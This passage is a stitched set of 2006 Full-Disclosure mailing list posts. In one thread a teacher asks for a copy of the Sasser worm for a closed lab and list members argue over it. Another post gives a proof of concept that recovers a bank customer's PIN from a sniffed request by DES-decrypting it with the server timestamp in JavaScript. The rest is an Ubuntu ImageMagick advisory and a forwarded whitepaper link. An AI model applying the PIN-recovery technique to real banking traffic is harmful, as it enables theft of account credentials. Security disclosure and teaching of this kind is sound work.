lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd)
-Original Message-
From: Gadi Evron [mailto:[EMAIL PROTECTED]
Sent: Monday, November 27, 2006 2:35 PM
To: Debasis Mohanty
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards
andPhishing Banks (fwd)
On Mon, 27 Nov 2006, Debasis Mohanty wrote:
More than a year Old (3rd August, 2005) -
Defeating CITI-BANK Virtual Keyboard Protection
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.htm
l
http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip
http://xforce.iss.net/xforce/xfdb/21727
- I hear buffer overflows were invented quite a few years back, too. :)
- That makes most new bof's irrelevant!
- Gadi.
Nah !! They have just became so common to hear or read ;)
Bty - The last post was not meant to get into somekind of argument but to
point out a different method to defeat such mechanism.
Regards,
-d
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Gadi
Evron
Sent: Sunday, November 26, 2006 12:18 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards
andPhishing Banks (fwd)
Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following
up a post by HispaSec. This is about breaking virtual keyboards
implementations, and the encryption some of them use (most of them
send the data in clear text with the image). HispaSec was a reference by
which we found the banks'
site as one using a virtual keyboard.
http://blogs.securiteam.com/index.php/archives/678
http://hispasec.com/laboratorio/cajamurcia_en.htm
Gadi.
Quoting:
Recently, I stumbled upon a post by HispaSec showing off a screen shot
trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which
nicely showed how a trojan horse can, utilizing a key stroke capture
and screenshot capture, grab a user's PIN number, fairly easily, and
wondered why are they taking this approach when the PIN numbers can be
easily retrieved by sniffing the data sent by the user to the banking
site, even though they are encrypted.
Image based keyboard (or virtual keyboards) were invented to make life
harder for banking or phishing trojan horses (specifically key-stroke
loggers or key loggers), some even suggested they be used specifically
to avoid these trojan horses. The bad guys adapted to this technology
and escalated. Now the trojan horses take screenshots of where the
mouse pointer is to determine what number they clicked on. Thing is,
it is often unnecessary as in most implementations of this technique
that we looked into (meaning, not all) it was flawed.
Instead of sending the remote image and waiting for the key-stroke
information to be sent back to the server (the technique which the
screenshots for pointer location on-click described above was used)
some banks send the PIN number in cleartext, while others encrypt
them, one such example is cajamurcia. Even when the encryption is
used, banks tend to implement it badly making it easy to recover the
PIN number from the encrypted form.
I investigated a bit more on how cajamurcia handles such PIN strokes
(with virtual keyboards) and I noticed something strange, they take
the timestamp of their server (cajamurcia) and send it to you - this
already posses a security problem - and this timestamp is then used to
encrypt the PIN number you entered.
This would have been a good idea if the timestamp was not sent back to
the server, making it hard or semi-hard to guess the timestamp used to
encrypt the data, but at the same time making it harder for the server
to know what timestamp was provided to the client (unless they store
it inside their session information). Anyhow, as it is sent back to
the server, we have everything we need to decrypt the data (PIN number).
PoC:
A request to the server would look like:
OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI
VRS=001 PAN=2043123456 SELLO=16100616012569 CL=1161006956
PINV3=si PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01
We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL
being the timestamp and PIN being the encrypted form of the PIN
number. If we feed these into the following JS code:
https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js
function hexToString (h) {
var r = ;
for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) {
r += String.fromCharCode (parseInt (h.substr (i, 2), 16)); } return r;
} calcula = '1161006956'; ciphertext =
hexToString('0xBBCB6E341C56C6B2');
var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1,
); console.debug(cleartext);
We will get our original PIN number. This isn't necessarily easier as
it requires data capture, which isn't always easy, but screen captures
usually require either an OCR, or manual labor, which the above
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, Peter Dawson wrote: I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so , then every school district board needs one.. :)- some do. schools partnered with, or using the curriculum of the Center for System Security and Information Assurance (www.cssia.org) come to mind. i'm sure there are others. Rick ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-386-1] ImageMagick vulnerability
=== Ubuntu Security Notice USN-386-1 November 28, 2006 imagemagick vulnerability CVE-2006-5868 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libmagick6 6:6.2.3.4-1ubuntu1.5 Ubuntu 6.06 LTS: libmagick9 6:6.2.4.5-0.6ubuntu0.4 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Daniel Kobras discovered multiple buffer overflows in ImageMagick's SGI file format decoder. By tricking a user or an automated system into processing a specially crafted SGI image, this could be exploited to execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5.diff.gz Size/MD5: 144276 f71b4df055bac9231c6d4794256d5732 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5.dsc Size/MD5: 899 0d1a0c35f2564b75e27af6a0a757f4c5 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4.orig.tar.gz Size/MD5: 5769194 7e9a3edd467a400a74126eb4a18e31ef amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 1334044 f1442ba90c54cfdd1dd0266828407376 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 259516 52c4772274427c11fe93dbc2ddb7445a http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6c2_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 171564 65bdac06e239398ee62f9ca67ce67e81 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 1671240 27f858940a212d836d37f197e1d558a7 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 1320974 c92c95369bd473aacb1741aa986df746 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.3.4-1ubuntu1.5_amd64.deb Size/MD5: 169642 7a89a61459b01be5af738d7694b6977c i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 1333074 ea2b1d5399c1a419ed9267f3ac8ec3e4 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 236018 c3b15c5532ce75a066bd7acb21053d42 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6c2_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 170892 9bb90b14ddfe5b083402b55220523ae7 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 1522170 254d36fb51155e07a65cf50f601fb90e http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 1224904 55afca2d998171a389b0f485660361ab http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.3.4-1ubuntu1.5_i386.deb Size/MD5: 164948 c366d85731e2bfe7e7d7d89586c094f6 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 1338026 a2df1ca024545fe1063712634f2fe411 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 260500 65b4ac7834603aef286b67c2bb3909e1 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6c2_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 164128 e5994c1f4c2820c2ce1fbb181cc608da http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 1874614 5e3a953a21b30afd852e0e3d4f847329 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 1258432 3e299d98ae6b102fa55f4f2879a7 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.3.4-1ubuntu1.5_powerpc.deb Size/MD5: 164090 419ffc1569e88008d0ce592d84fd09f0 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.3.4-1ubuntu1.5_sparc.deb Size/MD5: 1333274 89495b2b8d2a0ccda003983c7aa4f6db http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.2.3.4-1ubuntu1.5_sparc.deb Size/MD5:
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote: so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...? WTF does that have to do with the topic? Unless you want to make the point that often, the McDonald's staff fails to use a level of food-preparation hygiene that matches the computer-security hygiene requirements to work with known malware? it seemed to me that you were arguing a reason for not distributing the binary was the guy is (not) clued enough to run a 'closed lab' without screwing up... making this a 'we shouldn't support this because we do not know this person is responsible' approach. so the context of my statement relates to consistency of accountability. do *you* know where to find a copy? Yes. did you always? Yes. i'm sorry, but i have a hard time believing this. have you always been able to configure a network to talk via EIGRP? No, because when I first got on the net, RFC1058 was still 4 years in the future. So it wasn't always possible, because the option didn't always exist. and once it did there was a point in time in which you learned. you learned because you had access to information. somone else provided this information. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate. Did I say I was one of the lot of people? Did you notice that I was replying *in the context of KF's comments* saying It's cool because it's in a closed lab? i must've missed that part. i jumped into this because i was once a student at university who benefited from this type of 'closed lab learning environment.' you are absolutely correct that something could go wrong, but fear of failure ought not keep one from trying. i'm reminded of Roosevelt's saying: It is not the critic who counts: not the man who points out how the strong man stumbles or where the doer of deeds could have done better. The credit belongs to the man who is actually in the arena, whose face is marred by dust and sweat and blood, who strives valiantly, who errs and comes up short again and again, because there is no effort without error or shortcoming, but who knows the great enthusiasms, the great devotions, who spends himself for a worthy cause; who, at the best, knows, in the end, the triumph of high achievement, and who, at the worst, if he fails, at least he fails while daring greatly, so that his place shall never be with those cold and timid souls who knew neither victory nor defeat. cheers, Rick ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FWD: RE: [Dailydave] Symantec Blackberry Whitepaper. (fwd)
-- Forwarded message -- Date: Mon, 27 Nov 2006 22:01:16 -0600 (CST) From: J.A. Terranson [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: RE: [Dailydave] Symantec Blackberry Whitepaper. Someone was kind enough to send it to me, so I am returning the favor for those who may still be looking for it: http://www.mfn.org/~measl/blackberry.security.pdf Enjoy! -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF Surely the larger lesson learned from that day is that other men, all over the world, took inspiration not from the heroism of the rescuers in New York or the passengers flying over Pennsylvania, but from the 19 hijackers - the twisted brilliance of their scheme and their willingness to sacrifice their lives to make a political and, as they saw it, religious statement. Richard Corliss/Time Magazine 11 Aug 2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
Yeah, old computers at schools are often given away for recycling. On Mon, Nov 27, 2006 at 10:42:14PM -0500, Matthew Flaschen wrote: What budget? Every school that would have a networking class also has obsolete computers. Take a dozen, reformat them, put on an unpatched version of Windows, pull out or disable wifi, and connect them all to a switch (also probably available second-hand). Ensure neither computers nor switch are connected to any other network. Sure, you have to be sure not to f* it up, but it doesn't cost anything. Set-up sasser on one by moving it off a CD-R. Wait. :) This should cost little or nothing. Matt Flaschen Peter Dawson wrote: I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so , then every school district board needs one.. :)- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- ___ | .__ .___ .___| | | |__ __| _/__| _/___ | |_/ ___\| | \_/ __ \ / __ |/ __ |/ __ \_ __ \| |\ \___| Y \ ___// /_/ / /_/ \ ___/| | \/| | \___ ___| /\___ \ |\___ __| | |\/ \/ \/ \/\/\/| | | |http://chedder.hacked.in | | cheesebox.terroristorganization.info | |___| You don't exist. Go away ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
